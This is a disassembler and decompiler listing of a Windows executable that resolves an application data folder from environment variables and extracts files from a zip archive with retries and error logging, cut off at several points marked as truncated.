if (*(auStackX_18 + iVar19) == 0) {
uVar45 = *(auStackX_18 + iVar19 + -0x18);
uVar46 = *(auStackX_18 + iVar19 + -0x14);
*(&stack0x00020170 + iVar19) = *(&uStackX_8 + iVar19);
*(&stack0x00020178 + iVar19) = *(&uStackX_10 + iVar19);
*(&stack0x00020160 + iVar19) = *(&stack0xfffffffffffffff8 + iVar19);
*(&stack0x00020164 + iVar19) = *(&stack0xfffffffffffffffc + iVar19);
*(&stack0x00020168 + iVar19) = uVar45;
*(&stack0x0002016c + iVar19) = uVar46;
uVar28 = "LOCALAPPDATA";
*(&uStack_48 + iVar19) = 0xc;
uVar37 = *(&uStack_48 + iVar19);
*(&uStack_48 + iVar19) = 0x140010827;
iVar20 = sub_1400155c5(&stack0x00020160 + iVar19, "LOCALAPPDATA", uVar37);
if (iVar20 == 0) {
uVar28 = "XDG_DATA_HOME";
*(&uStack_48 + iVar19) = 0xd;
uVar37 = *(&uStack_48 + iVar19);
*(&uStack_48 + iVar19) = 0x14001084f;
iVar20 = sub_1400155c5(&stack0x00020160 + iVar19, "XDG_DATA_HOME", uVar37);
if (iVar20 == 0) {
uVar45 = param_2[1];
uVar46 = param_2[2];
uVar47 = param_2[3];
*(&stack0x000202a0 + iVar19) = *param_2;
*(&stack0x000202a4 + iVar19) = uVar45;
*(&stack0x000202a8 + iVar19) = uVar46;
*(&stack0x000202ac + iVar19) = uVar47;
*(&uStack_48 + iVar19) = 0x140010d93;
sub_140013636(&stack0x00010000 + iVar19, param_2);
if (*(&stack0x00010020 + iVar19) != 0) {
code_r0x0001400114c4:
*(&uStack_48 + iVar19) = 0x1400114d0;
sub_140013cbc(&stack0x00020160 + iVar19);
goto code_r0x0001400114d0;
}
*(&stack0x00020130 + iVar19) = *(&stack0x00010010 + iVar19);
*(&stack0x00020138 + iVar19) = *(&stack0x00010018 + iVar19);
*(&stack0x00020120 + iVar19) = *(&stack0x00010000 + iVar19);
*(&stack0x00020124 + iVar19) = *(&stack0x00010004 + iVar19);
*(&stack0x00020128 + iVar19) = *(&stack0x00010008 + iVar19);
*(&stack0x0002012c + iVar19) = *(&stack0x0001000c + iVar19);
uVar28 = "HOME";
*(&uStack_48 + iVar19) = 4;
uVar37 = *(&uStack_48 + iVar19);
*(&uStack_48 + iVar19) = 0x140010dcc;
iVar20 = sub_1400155c5(&stack0x00020120 + iVar19, "HOME", uVar37);
if (iVar20 == 0) {
uVar28 = "USERPROFILE";
*(&uStack_48 + iVar19) = 0xb;
uVar37 = *(&uStack_48 + iVar19);
*(&uStack_48 + iVar19) = 0x1400110d3;
iVar20 = sub_1400155c5(&stack0x00020120 + iVar19, "USERPROFILE", uVar37);
if (iVar20 == 0) {
*(&uStack_48 + iVar19) = 0x1400114c4;
sub_140013cbc(&stack0x00020120 + iVar19);
goto code_r0x0001400114c4;
}
puVar24 = &stack0x00020368;
}
else {
puVar24 = &stack0x00020280;
}
puVar32 = puVar24 + iVar19;
*(&uStack_48 + iVar19) = 0x1400110f8;
sub_14000e323(puVar32, &stack0x000202a0 + iVar19, iVar20, uVar28);
*(&uStack_48 + iVar19) = 0x140011104;
sub_140013cbc(&stack0x00020120 + iVar19);
if (*(puVar32 + 2) != 0) goto code_r0x0001400114c4;
uVar28 = *puVar32;
uVar37 = puVar32[1];
*(&stack0x000200f0 + iVar19) = uVar28;
*(&stack0x000200f8 + iVar19) = uVar37;
*(&stack0x00020100 + iVar19) = "AppData/Local";
*(&stack0x00020108 + iVar19) = 0xd;
*(&uStack_48 + iVar19) = 0x140011149;
sub_14000e390(&stack0x000202e0 + iVar19, param_2);
if (*(&stack0x000202f0 + iVar19) != 0) {
*(&uStack_48 + iVar19) = 0x140013443;
sub_14000e53c(&stack0x000202c0 + iVar19, uVar28, uVar37);
goto code_r0x0001400114c4;
}
*(&stack0x000203b8 + iVar19) = *(&stack0x000202e0 + iVar19);
uVar40 = *(&stack0x000202e8 + iVar19);
*(&uStack_48 + iVar19) = 0x14001117b;
sub_14000e53c(&stack0x000202c0 + iVar19, uVar28, uVar37);
*(&uStack_48 + iVar19) = 0x140011187;
sub_140013cbc(&stack0x00020160 + iVar19);
goto code_r0x0001400108a0;
}
puVar24 = &stack0x00020198;
}
else {
puVar24 = &stack0x00020240;
}
puVar32 = puVar24 + iVar19;
*(&uStack_48 + iVar19) = 0x140010874;
sub_14000e323(puVar32, &stack0x000202c0 + iVar19, iVar20, uVar28);
*(&uStack_48 + iVar19) = 0x140010880;
sub_140013cbc(&stack0x00020160 + iVar19);
iVar18 = *(puVar32 + 2);
uVar28 = "C:\\Users\\Public";
if (iVar18 == 0) {
uVar28 = *puVar32;
}
*(&stack0x000203b8 + iVar19) = uVar28;
*(&uStack_48 + iVar19) = 0xf;
uVar40 = *(&uStack_48 + iVar19);
if (iVar18 == 0) {
uVar40 = puVar32[1];
}
}
else {
code_r0x0001400114d0:
*(&uStack_48 + iVar19) = 0xf;
uVar40 = *(&uStack_48 + iVar19);
*(&stack0x000203b8 + iVar19) = "C:\\Users\\Public";
}
code_r0x0001400108a0:
*(&uStack_48 + iVar19) = 0x1400108ac;
uVar28 = sub_1400151ce(0x140024ef0);
/* listing truncated */0x140013D2C sub_140013d2c str 9 api 0 imm 13 Unknown
sub_140013d2c() {
push rbp
push r15
push r14
push rsi
push rdi
push rbx
mov eax, 0x301D8
call sub_140021d41()
sub rsp, rax
lea rbp, [rsp+0x80]
call sub_1400172a6()
call sub_1400172a6()
lea rsi, [rbp-0x58]
xor ecx, ecx
mov rdx, rsi
mov r8d, 0x17FFE
call jmp_kernel32.GetModuleFileNameW()
mov ecx, 0xFFFE8002
lea edx, [rax+rcx*1]
cmp edx, ecx
jnbe .1
mov di, 0x5B
jmp .2
.1:
mov eax, eax
and word ptr [rbp+rax*2-0x58], 0x00
lea rcx, [rbp-0x58]
call sub_14000ff16()
mov edi, eax
test ax, ax
jz .5
.2:
call sub_1400185a2()
test al, 0x01
jz .17
call sub_14001c594()
mov rcx, gs:[0x30]
mov rcx, [rcx+0x60]
mov rcx, [rcx+0x20]
mov rcx, [rcx+0x30]
mov [rbp-0x58], rcx
and qword ptr [rbp-0x50], 0x00
mov rbx, rax
lea rax, [rbp+0x30090]
mov [rax], rsi
lea rcx, [rbp+0x2FFF8]
mov [rcx], rax
lea r15, [sub_14001e304()]
mov [rcx+0x08], r15
lea rdx, ["%t[%l]%s%L %m\n"]
xor r8d, r8d
call sub_140017f82()
movzx eax, byte ptr [0x14005C110]
test eax, eax
jz .6
cmp eax, 0x01
jnz .7
lea rax, [rbp+0x30088]
mov [rax], rsi
lea rcx, [rbp+0x30078]
mov [rcx], rax
mov [rcx+0x08], r15
lea rdx, [0x1400556B1]
push 0x05
pop r8
call sub_140017f82()
test rbx, rbx
jz .3
lea r14, [rbp+0x30138]
lea r8, [rbp+0x3009E]
mov rcx, r14
mov rdx, rbx
call sub_14001eafa()
cmp word ptr [r14+0x10], 0x00
jnz .3
mov rdx, [rbp+0x30138]
mov r8, [rbp+0x30140]
lea rax, [rbp+0x30070]
mov [rax], rsi
lea rcx, [rbp+0x30120]
mov [rcx], rax
mov [rcx+0x08], r15
call sub_140017f82()
.3:
lea rax, [rbp+0x30068]
mov [rax], rsi
lea rcx, [rbp+0x300E0]
mov [rcx], rax
mov [rcx+0x08], r15
lea rdx, [0x1400556B6]
push 0x05
pop r8
.4:
call sub_140017f82()
jmp .9
.5:
call sub_1400172a6()
jmp .17
.6:
test rbx, rbx
jz .9
lea r14, [rbp+0x30138]
lea r8, [rbp+0x3009E]
mov rcx, r14
mov rdx, rbx
call sub_14001eafa()
cmp word ptr [r14+0x10], 0x00
jnz .9
mov rdx, [rbp+0x30138]
mov r8, [rbp+0x30140]
lea rax, [rbp+0x30120]
mov [rax], rsi
lea rcx, [rbp+0x300E0]
mov [rcx], rax
mov [rcx+0x08], r15
jmp .4
.7:
movups xmm0, [0x14005C100]
lea rdx, [rbp+0x30120]
movaps [rdx], xmm0
lea rcx, [0x140055738]
call sub_14001ef91()
test rbx, rbx
jz .8
lea r14, [rbp+0x30138]
lea r8, [rbp+0x3009E]
mov rcx, r14
mov rdx, rbx
call sub_14001eafa()
cmp word ptr [r14+0x10], 0x00
jnz .8
mov rdx, [rbp+0x30138]
mov r8, [rbp+0x30140]
lea rax, [rbp+0x30078]
mov [rax], rsi
lea rcx, [rbp+0x300E0]
mov [rcx], rax
mov [rcx+0x08], r15
call sub_140017f82()
.8:
lea rcx, [0x140055750]
lea rdx, [rbp+0x30120]
call sub_14001ef91()
.9:
lea rax, [rbp+0x30060]
mov [rax], rsi
lea rcx, [rbp+0x2FFE8]
mov [rcx], rax
mov [rcx+0x08], r15
lea rdx, [0x14005569A]
push 0x01
pop r8
call sub_140017f82()
movzx eax, byte ptr [0x14005C110]
test eax, eax
jz .10
cmp eax, 0x01
jnz .12
lea rax, [rbp+0x30058]
mov [rax], rsi
lea rcx, [rbp+0x30048]
mov [rcx], rax
mov [rcx+0x08], r15
lea rdx, [0x1400556BF]
push 0x09
pop r8
call sub_140017f82()
lea rax, [rbp+0x30040]
mov [rax], rsi
lea rcx, [rbp+0x30100]
mov [rcx], rax
mov [rcx+0x08], r15
lea rdx, [0x1400556BB]
push 0x03
pop r8
call sub_140017f82()
lea rax, [rbp+0x30038]
mov [rax], rsi
lea rcx, [rbp+0x300D0]
mov [rcx], rax
mov [rcx+0x08], r15
lea rdx, [0x1400556C8]
push 0x0A
jmp .11
.10:
lea rax, [rbp+0x30100]
mov [rax], rsi
lea rcx, [rbp+0x300D0]
mov [rcx], rax
mov [rcx+0x08], r15
lea rdx, [0x1400556BB]
push 0x03
.11:
pop r8
call sub_140017f82()
jmp .13
.12:
movups xmm0, [0x14005C100]
lea rbx, [rbp+0x30100]
movaps [rbx], xmm0
lea rcx, [0x140055768]
mov rdx, rbx
call sub_14001ef91()
lea rcx, [0x140055780]
mov rdx, rbx
call sub_14001ef91()
lea rax, [rbp+0x30048]
mov [rax], rsi
lea rcx, [rbp+0x300D0]
mov [rcx], rax
mov [rcx+0x08], r15
lea rdx, [0x1400556BB]
push 0x03
pop r8
call sub_140017f82()
lea rcx, [0x140055750]
mov rdx, rbx
call sub_14001ef91()
.13:
; listing truncated
/* DISPLAY WARNING: Type casts are NOT being printed */
void sub_140013d2c(void)
{
undefined *puVar1;
undefined4 *puVar2;
int16_t iVar3;
uint32_t uVar4;
int64_t iVar5;
uint64_t uVar6;
int64_t iVar7;
int64_t **ppiVar8;
undefined8 uVar9;
undefined8 uVar10;
int64_t unaff_GS_OFFSET;
undefined8 uStack_38;
uStack_38 = 0x140013d3e;
iVar5 = sub_140021d41();
iVar5 = -iVar5;
*(&uStack_38 + iVar5) = 0x140013d4e;
sub_1400172a6();
*(&uStack_38 + iVar5) = 0x140013d53;
sub_1400172a6();
puVar1 = &stack0xfffffffffffffff8 + iVar5;
*(&uStack_38 + iVar5) = 0x140013d67;
uVar4 = jmp_kernel32.GetModuleFileNameW(0, puVar1, 0x17ffe);
if (uVar4 - 0x17ffe < 0xfffe8003) {
iVar3 = 0x5b;
}
else {
*(&stack0xfffffffffffffff8 + uVar4 * 2 + iVar5) = 0;
*(&uStack_38 + iVar5) = 0x140013d8a;
iVar3 = sub_14000ff16(&stack0xfffffffffffffff8 + iVar5);
if (iVar3 == 0) {
*(&uStack_38 + iVar5) = 0x140013eb9;
sub_1400172a6();
return;
}
}
*(&uStack_38 + iVar5) = 0x140013d9a;
uVar6 = sub_1400185a2();
if ((uVar6 & 1) == 0) {
return;
}
*(&uStack_38 + iVar5) = 0x140013da7;
iVar7 = sub_14001c594();
*(&stack0xfffffffffffffff8 + iVar5) = *(*(*(*(unaff_GS_OFFSET + 0x30) + 0x60) + 0x20) + 0x30);
*(&stack0x00000000 + iVar5) = 0;
*(&stack0x000300e0 + iVar5) = puVar1;
*(&stack0x00030048 + iVar5) = &stack0x000300e0 + iVar5;
*(&stack0x00030050 + iVar5) = sub_14001e304;
*(&uStack_38 + iVar5) = 0x140013df6;
sub_140017f82(&stack0x00030048 + iVar5, "%t[%l]%s%L %m\u25d9", 0);
if ([0x0x14005c110] == '\0') {
if (iVar7 != 0) {
*(&uStack_38 + iVar5) = 0x140013ee0;
sub_14001eafa(&stack0x00030188 + iVar5, iVar7, &stack0x000300ee + iVar5);
if (*(&stack0x00030198 + iVar5) == 0) {
uVar9 = *(&stack0x00030188 + iVar5);
uVar10 = *(&stack0x00030190 + iVar5);
*(&stack0x00030170 + iVar5) = puVar1;
ppiVar8 = &stack0x00030130 + iVar5;
*ppiVar8 = &stack0x00030170 + iVar5;
*(&stack0x00030138 + iVar5) = sub_14001e304;
goto code_r0x000140013eaa;
}
}
}
else if ([0x0x14005c110] == '\x01') {
*(&stack0x000300d8 + iVar5) = puVar1;
*(&stack0x000300c8 + iVar5) = &stack0x000300d8 + iVar5;
*(&stack0x000300d0 + iVar5) = sub_14001e304;
*(&uStack_38 + iVar5) = 5;
uVar9 = *(&uStack_38 + iVar5);
*(&uStack_38 + iVar5) = 0x140013e36;
sub_140017f82(&stack0x000300c8 + iVar5, 0x1400556b1, uVar9);
if (iVar7 != 0) {
*(&uStack_38 + iVar5) = 0x140013e54;
sub_14001eafa(&stack0x00030188 + iVar5, iVar7, &stack0x000300ee + iVar5);
if (*(&stack0x00030198 + iVar5) == 0) {
*(&stack0x000300c0 + iVar5) = puVar1;
*(&stack0x00030170 + iVar5) = &stack0x000300c0 + iVar5;
*(&stack0x00030178 + iVar5) = sub_14001e304;
*(&uStack_38 + iVar5) = 0x140013e87;
sub_140017f82(&stack0x00030170 + iVar5, *(&stack0x00030188 + iVar5), *(&stack0x00030190 + iVar5));
}
}
*(&stack0x000300b8 + iVar5) = puVar1;
ppiVar8 = &stack0x00030130 + iVar5;
*ppiVar8 = &stack0x000300b8 + iVar5;
*(&stack0x00030138 + iVar5) = sub_14001e304;
uVar9 = 0x1400556b6;
*(&uStack_38 + iVar5) = 5;
uVar10 = *(&uStack_38 + iVar5);
code_r0x000140013eaa:
*(&uStack_38 + iVar5) = 0x140013eaf;
sub_140017f82(ppiVar8, uVar9, uVar10);
}
else {
*(&stack0x00030170 + iVar5) = [0x0x14005c100];
*(&stack0x00030174 + iVar5) = [0x0x14005c104];
*(&stack0x00030178 + iVar5) = [0x0x14005c108];
*(&stack0x0003017c + iVar5) = [0x0x14005c10c];
*(&uStack_38 + iVar5) = 0x140013f31;
sub_14001ef91(0x140055738);
if (iVar7 != 0) {
*(&uStack_38 + iVar5) = 0x140013f4f;
sub_14001eafa(&stack0x00030188 + iVar5, iVar7, &stack0x000300ee + iVar5);
if (*(&stack0x00030198 + iVar5) == 0) {
*(&stack0x000300c8 + iVar5) = puVar1;
*(&stack0x00030130 + iVar5) = &stack0x000300c8 + iVar5;
*(&stack0x00030138 + iVar5) = sub_14001e304;
*(&uStack_38 + iVar5) = 0x140013f82;
sub_140017f82(&stack0x00030130 + iVar5, *(&stack0x00030188 + iVar5), *(&stack0x00030190 + iVar5));
}
}
*(&uStack_38 + iVar5) = 0x140013f95;
sub_14001ef91(0x140055750, &stack0x00030170 + iVar5);
}
*(&stack0x000300b0 + iVar5) = puVar1;
*(&stack0x00030038 + iVar5) = &stack0x000300b0 + iVar5;
*(&stack0x00030040 + iVar5) = sub_14001e304;
*(&uStack_38 + iVar5) = 1;
uVar9 = *(&uStack_38 + iVar5);
*(&uStack_38 + iVar5) = 0x140013fbd;
sub_140017f82(&stack0x00030038 + iVar5, 0x14005569a, uVar9);
if ([0x0x14005c110] == '\0') {
*(&stack0x00030150 + iVar5) = puVar1;
ppiVar8 = &stack0x00030120 + iVar5;
*ppiVar8 = &stack0x00030150 + iVar5;
*(&stack0x00030128 + iVar5) = sub_14001e304;
uVar9 = 0x1400556bb;
*(&uStack_38 + iVar5) = 3;
}
else {
if ([0x0x14005c110] != '\x01') {
puVar2 = &stack0x00030150 + iVar5;
*puVar2 = [0x0x14005c100];
*(&stack0x00030154 + iVar5) = [0x0x14005c104];
*(&stack0x00030158 + iVar5) = [0x0x14005c108];
*(&stack0x0003015c + iVar5) = [0x0x14005c10c];
*(&uStack_38 + iVar5) = 0x14001408e;
sub_14001ef91(0x140055768, puVar2);
*(&uStack_38 + iVar5) = 0x14001409d;
sub_14001ef91(0x140055780, puVar2);
*(&stack0x00030098 + iVar5) = puVar1;
*(&stack0x00030120 + iVar5) = &stack0x00030098 + iVar5;
*(&stack0x00030128 + iVar5) = sub_14001e304;
*(&uStack_38 + iVar5) = 3;
uVar9 = *(&uStack_38 + iVar5);
*(&uStack_38 + iVar5) = 0x1400140c5;
sub_140017f82(&stack0x00030120 + iVar5, 0x1400556bb, uVar9);
*(&uStack_38 + iVar5) = 0x1400140d4;
sub_14001ef91(0x140055750, puVar2);
goto code_r0x0001400140d4;
}
*(&stack0x000300a8 + iVar5) = puVar1;
*(&stack0x00030098 + iVar5) = &stack0x000300a8 + iVar5;
*(&stack0x000300a0 + iVar5) = sub_14001e304;
*(&uStack_38 + iVar5) = 9;
uVar9 = *(&uStack_38 + iVar5);
*(&uStack_38 + iVar5) = 0x140013ff9;
sub_140017f82(&stack0x00030098 + iVar5, 0x1400556bf, uVar9);
*(&stack0x00030090 + iVar5) = puVar1;
*(&stack0x00030150 + iVar5) = &stack0x00030090 + iVar5;
*(&stack0x00030158 + iVar5) = sub_14001e304;
*(&uStack_38 + iVar5) = 3;
uVar9 = *(&uStack_38 + iVar5);
*(&uStack_38 + iVar5) = 0x140014021;
sub_140017f82(&stack0x00030150 + iVar5, 0x1400556bb, uVar9);
*(&stack0x00030088 + iVar5) = puVar1;
ppiVar8 = &stack0x00030120 + iVar5;
*ppiVar8 = &stack0x00030088 + iVar5;
*(&stack0x00030128 + iVar5) = sub_14001e304;
uVar9 = 0x1400556c8;
*(&uStack_38 + iVar5) = 10;
}
uVar10 = *(&uStack_38 + iVar5);
*(&uStack_38 + iVar5) = 0x14001406c;
sub_140017f82(ppiVar8, uVar9, uVar10);
code_r0x0001400140d4:
*(&stack0x00030080 + iVar5) = puVar1;
*(&stack0x00030028 + iVar5) = &stack0x00030080 + iVar5;
*(&stack0x00030030 + iVar5) = sub_14001e304;
*(&uStack_38 + iVar5) = 1;
uVar9 = *(&uStack_38 + iVar5);
*(&uStack_38 + iVar5) = 0x1400140fe;
sub_140017f82(&stack0x00030028 + iVar5, 0x14005569d, uVar9);
*(&stack0x00030078 + iVar5) = puVar1;
*(&stack0x00030018 + iVar5) = &stack0x00030078 + iVar5;
*(&stack0x00030020 + iVar5) = sub_14001e304;
*(&uStack_38 + iVar5) = 0x140014125;
sub_140017f82(&stack0x00030018 + iVar5, 0x1400556a0, 0);
*(&stack0x00030070 + iVar5) = puVar1;
*(&stack0x00030008 + iVar5) = &stack0x00030070 + iVar5;
*(&stack0x00030010 + iVar5) = sub_14001e304;
*(&uStack_38 + iVar5) = 0x14001414c;
sub_140017f82(&stack0x00030008 + iVar5, 0x1400556a2, uVar9);
if ([0x0x14005c110] == '\0') {
*(&stack0x00030110 + iVar5) = iVar3;
*(&stack0x00030140 + iVar5) = puVar1;
*(&stack0x00030100 + iVar5) = &stack0x00030140 + iVar5;
*(&stack0x00030108 + iVar5) = sub_14001e304;
*(&uStack_38 + iVar5) = 0x1400141fd;
sub_14001ff6d();
}
else if ([0x0x14005c110] == '\x01') {
*(&stack0x00030068 + iVar5) = puVar1;
*(&stack0x00030110 + iVar5) = &stack0x00030068 + iVar5;
*(&stack0x00030118 + iVar5) = sub_14001e304;
*(&uStack_38 + iVar5) = 0x14001418a;
sub_140017f82(&stack0x00030110 + iVar5, 0x140024be7, 0);
*(&stack0x000301a6 + iVar5) = iVar3;
*(&stack0x00030060 + iVar5) = puVar1;
*(&stack0x00030140 + iVar5) = &stack0x00030060 + iVar5;
*(&stack0x00030148 + iVar5) = sub_14001e304;
*(&uStack_38 + iVar5) = 0x1400141b1;
/* listing truncated */0x14000E5C1 sub_14000e5c1 str 7 api 0 imm 20 Unknown
sub_14000e5c1() {
push rbp
push r15
push r14
push r13
push r12
push rsi
push rdi
push rbx
mov eax, 0x31648
call sub_140021d41()
sub rsp, rax
lea rbp, [rsp+0x80]
mov [rbp+0x315B0], r9
mov [rbp+0x31590], rcx
movups xmm0, [rcx]
movaps [rbp+0x31580], xmm0
test r8, r8
setz al
cmp qword ptr [rbp+0x31630], 0x00
setz cl
or cl, al
mov r15w, 0x17
jnz .24
mov rdi, r8
mov rbx, rdx
mov rax, gs:[0x30]
mov rax, [rax+0x60]
mov rax, [rax+0x20]
mov rax, [rax+0x48]
lea rdx, [rbp+0x314C8]
mov [rdx], rax
lea rax, [0x140024F00]
mov [rsp+0x20], rax
lea rsi, [rbp+0x314B8]
mov rcx, rsi
mov r8, rbx
mov r9, rdi
call sub_140015816()
cmp word ptr [rsi+0x08], 0x00
jnz .1
mov rcx, [rbp+0x314B8]
call jmp_ntdll.NtClose()
.1:
lea r8, [rdi+0x01]
lea rsi, [rbp+0x314A0]
lea rdx, [rbp+0x31580]
mov rcx, rsi
call sub_140015d45()
movzx r15d, word ptr [rsi+0x10]
test r15w, r15w
jnz .24
mov rsi, [rbp+0x314A0]
mov rdx, [rbp+0x314A8]
xor eax, eax
.2:
cmp rdi, rax
jz .3
mov cl, [rbx+rax*1]
mov [rsi+rax*1], cl
inc rax
jmp .2
.3:
mov [rbp+0x315C0], rdx
mov byte ptr [rsi+rdi*1], 0x00
xorps xmm0, xmm0
lea r12, [rbp+0x31420]
movaps [r12+0x60], xmm0
movaps [r12+0x50], xmm0
movaps [r12+0x40], xmm0
movaps [r12+0x30], xmm0
movaps [r12+0x20], xmm0
movaps [r12+0x10], xmm0
movaps [r12], xmm0
mov r13b, 0xFC
.4:
mov rcx, r12
mov rdx, rsi
xor r8d, r8d
call sub_1400061b1()
test eax, eax
jnz .5
mov rcx, r12
call sub_14000c8ed()
mov ecx, eax
call sub_14000c909()
mov rcx, rax
call sub_14001593d()
test r13b, r13b
jz .7
mov ecx, 0x3E8
call jmp_kernel32.Sleep()
inc r13b
jmp .4
.5:
mov rax, gs:[0x30]
mov rax, [rax+0x60]
mov rax, [rax+0x20]
mov rax, [rax+0x48]
lea rcx, [rbp+0x31498]
mov [rcx], rax
mov rdx, [rbp+0x315B0]
mov r8, [rbp+0x31630]
call sub_14000f912()
test ax, ax
jz .9
mov edi, eax
mov rax, gs:[0x30]
mov rax, [rax+0x60]
mov rax, [rax+0x20]
mov rax, [rax+0x30]
lea rbx, [rbp-0x50]
mov [rbx], rax
and qword ptr [rbx+0x08], 0x00
call sub_1400156a9()
lea rax, [rbp+0x2FFB8]
mov [rax], rbx
lea rcx, [rbp+0x30410]
mov [rcx], rax
lea rax, [sub_14001e304()]
mov [rcx+0x08], rax
lea rdx, [0x140055907]
push 0x23
pop r8
call sub_140017f82()
test ax, ax
mov rbx, [rbp+0x315C0]
jnz .6
lea r8, [0x140055960]
lea r9, [rbp+0x30410]
mov rcx, [rbp+0x315B0]
mov rdx, [rbp+0x31630]
call sub_14001c11f()
test ax, ax
jnz .6
lea rdx, [0x14005592A]
lea rcx, [rbp+0x30410]
push 0x03
pop r8
call sub_140017f82()
test ax, ax
jnz .6
movups xmm0, [rbp+0x30410]
lea rcx, [rbp+0x17FB0]
movaps [rcx], xmm0
lea rdx, ["error."]
push 0x06
pop r8
call sub_140017f82()
test ax, ax
jnz .6
movsx rax, di
shl rax, 0x04
lea rcx, [0x140056570]
mov rdx, [rax+rcx*1]
mov r8, [rax+rcx*1+0x08]
lea rcx, [rbp+0x17FB0]
call sub_140017f82()
test ax, ax
jnz .6
lea rdx, [0x14002514A]
lea rcx, [rbp+0x30410]
push 0x01
pop r8
call sub_140017f82()
test ax, ax
jnz .6
lea rcx, [rbp-0x50]
call sub_14001c54d()
.6:
call sub_140015751()
lea rcx, [rbp+0x31420]
call sub_1400057f9()
mov r15w, 0x16
jmp .23
.7:
mov r14, rax
mov r15, rdx
mov rax, gs:[0x30]
mov rax, [rax+0x60]
mov rax, [rax+0x20]
mov rax, [rax+0x30]
lea r12, [rbp-0x50]
mov [r12], rax
and qword ptr [r12+0x08], 0x00
call sub_1400156a9()
lea rax, [rbp+0x30410]
mov [rax], r12
lea rcx, [rbp+0x17FB0]
mov [rcx], rax
lea rax, [sub_14001e304()]
mov [rcx+0x08], rax
lea rdx, ["error(zip): Failed to open zip f.. error: Failed to extract file: "]
push 0x3C
pop r8
call sub_140017f82()
test ax, ax
jnz .8
lea r8, [0x140055960]
lea r9, [rbp+0x17FB0]
mov rcx, rbx
mov rdx, rdi
call sub_14001c11f()
test ax, ax
jnz .8
lea rdx, [0x140055904]
lea rcx, [rbp+0x17FB0]
push 0x03
pop r8
call sub_140017f82()
test ax, ax
jnz .8
lea r8, [0x140055960]
lea r9, [rbp+0x17FB0]
mov rcx, r14
mov rdx, r15
call sub_14001c11f()
test ax, ax
jnz .8
lea rdx, [0x14002514A]
; listing truncated
/* DISPLAY WARNING: Type casts are NOT being printed */
uint64_t sub_14000e5c1(undefined4 *param_1,int64_t param_2,int64_t param_3,undefined8 param_4)
{
undefined (*pauVar1) [16];
undefined *puVar2;
uint8_t uVar3;
uint16_t uVar4;
undefined4 *puVar5;
undefined4 uVar6;
undefined4 uVar7;
undefined4 uVar8;
int16_t iVar9;
int16_t iVar10;
int32_t iVar11;
undefined4 uVar12;
uint32_t uVar13;
int64_t iVar14;
int64_t iVar15;
undefined8 uVar16;
uint64_t uVar17;
uint64_t uVar18;
int64_t iVar19;
uint8_t uVar20;
undefined8 uVar21;
uint64_t uVar22;
undefined8 uVar23;
char cVar24;
uint64_t uVar25;
undefined8 unaff_R15;
int64_t unaff_GS_OFFSET;
undefined8 uStack_48;
uStack_48 = 0x14000e5d7;
iVar14 = sub_140021d41();
iVar14 = -iVar14;
*(&stack0x000315f0 + iVar14) = param_4;
*(&stack0x000315d0 + iVar14) = param_1;
uVar12 = param_1[1];
uVar6 = param_1[2];
uVar7 = param_1[3];
*(&stack0x000315c0 + iVar14) = *param_1;
*(&stack0x000315c4 + iVar14) = uVar12;
*(&stack0x000315c8 + iVar14) = uVar6;
*(&stack0x000315cc + iVar14) = uVar7;
uVar17 = CONCAT62(unaff_R15 >> 0x10, 0x17);
if (*(&stack0x00031670 + iVar14) != 0 && param_3 != 0) {
*(&stack0x00031508 + iVar14) = *(*(*(*(unaff_GS_OFFSET + 0x30) + 0x60) + 0x20) + 0x48);
*(&stack0xffffffffffffffe0 + iVar14) = 0x140024f00;
*(&uStack_48 + iVar14) = 0x14000e65e;
sub_140015816(&stack0x000314f8 + iVar14, &stack0x00031508 + iVar14, param_2, param_3);
if (*(&stack0x00031500 + iVar14) == 0) {
*(&uStack_48 + iVar14) = 0x14000e671;
jmp_ntdll.NtClose(*(&stack0x000314f8 + iVar14));
}
*(&uStack_48 + iVar14) = 0x14000e68b;
sub_140015d45(&stack0x000314e0 + iVar14, &stack0x000315c0 + iVar14, param_3 + 1);
uVar17 = *(&stack0x000314f0 + iVar14);
if (*(&stack0x000314f0 + iVar14) == 0) {
iVar19 = *(&stack0x000314e0 + iVar14);
uVar16 = *(&stack0x000314e8 + iVar14);
for (iVar15 = 0; param_3 != iVar15; iVar15 = iVar15 + 1) {
*(iVar19 + iVar15) = *(param_2 + iVar15);
}
*(&stack0x00031600 + iVar14) = uVar16;
*(iVar19 + param_3) = 0;
pauVar1 = &stack0x00031460 + iVar14;
*(&stack0x000314c0 + iVar14) = ZEXT816(0);
*(&stack0x000314b0 + iVar14) = ZEXT816(0);
*(&stack0x000314a0 + iVar14) = ZEXT816(0);
*(&stack0x00031490 + iVar14) = ZEXT816(0);
*(&stack0x00031480 + iVar14) = ZEXT816(0);
*(&stack0x00031470 + iVar14) = ZEXT816(0);
*pauVar1 = ZEXT816(0);
cVar24 = -4;
while( true ) {
*(&uStack_48 + iVar14) = 0x14000e709;
iVar15 = iVar19;
iVar11 = sub_1400061b1(pauVar1, iVar19, 0);
if (iVar11 != 0) break;
*(&uStack_48 + iVar14) = 0x14000e715;
uVar12 = sub_14000c8ed(pauVar1);
*(&uStack_48 + iVar14) = 0x14000e71c;
uVar16 = sub_14000c909(uVar12);
*(&uStack_48 + iVar14) = 0x14000e724;
uVar16 = sub_14001593d(uVar16);
if (cVar24 == '\0') {
*(&stack0xfffffffffffffff0 + iVar14) = *(*(*(*(unaff_GS_OFFSET + 0x30) + 0x60) + 0x20) + 0x30);
*(&stack0xfffffffffffffff8 + iVar14) = 0;
*(&uStack_48 + iVar14) = 0x14000e8e1;
sub_1400156a9();
*(&stack0x00030450 + iVar14) = &stack0xfffffffffffffff0 + iVar14;
*(&stack0x00017ff0 + iVar14) = &stack0x00030450 + iVar14;
*(&stack0x00017ff8 + iVar14) = sub_14001e304;
*(&uStack_48 + iVar14) = 0x3c;
uVar23 = *(&uStack_48 + iVar14);
*(&uStack_48 + iVar14) = 0x14000e910;
iVar10 = sub_140017f82(&stack0x00017ff0 + iVar14, "error(zip): Failed to open zip file after multiple retries: - error: Failed to create directory '': error: Failed to extract file: ", uVar23);
if (iVar10 == 0) {
*(&uStack_48 + iVar14) = 0x14000e92e;
iVar10 = sub_14001c11f(param_2, param_3, 0x140055960, &stack0x00017ff0 + iVar14);
if (iVar10 == 0) {
*(&uStack_48 + iVar14) = 3;
uVar23 = *(&uStack_48 + iVar14);
*(&uStack_48 + iVar14) = 0x14000e94a;
iVar10 = sub_140017f82(&stack0x00017ff0 + iVar14, 0x140055904, uVar23);
if (iVar10 == 0) {
*(&uStack_48 + iVar14) = 0x14000e968;
iVar10 = sub_14001c11f(uVar16, iVar15, 0x140055960, &stack0x00017ff0 + iVar14);
if (iVar10 == 0) {
*(&uStack_48 + iVar14) = 1;
